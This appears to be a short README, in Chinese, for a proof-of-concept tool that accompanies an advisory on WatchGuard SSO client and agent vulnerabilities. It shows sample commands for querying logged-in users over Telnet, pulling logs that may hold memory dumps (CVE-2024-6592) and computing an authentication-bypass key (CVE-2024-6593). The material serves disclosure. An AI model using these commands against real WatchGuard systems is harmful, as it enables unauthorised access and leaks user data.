详细信息请参阅我们发布的安全公告:
运行该脚本需要 Python click 库。
子命令 command 可用于向 Watchguard SSO 客户端的 Telnet 接口下发命令。例如,可以获取当前登录用户列表:
$ ./wgclient.py command --host 'client.domainname' 'get user a'
子命令 logfile 可用于获取 Watchguard SSO 客户端的日志文件。日志文件中可能包含崩溃内存转储(详情请参阅 CVE-2024-6592)。
$ ./wgclient.py logfile --host 'client.domainname'
子命令 authbypass 可用于计算登录 Watchguard SSO 代理 Telnet 管理接口所需的密钥值。该密钥根据代理在连接时发送的横幅计算得出,需要将横幅作为参数提供。详情请参阅 CVE-2024-6593 的公告。
$ ./wgclient.py authbypass 'EVENT 350 log info Connected to [...]'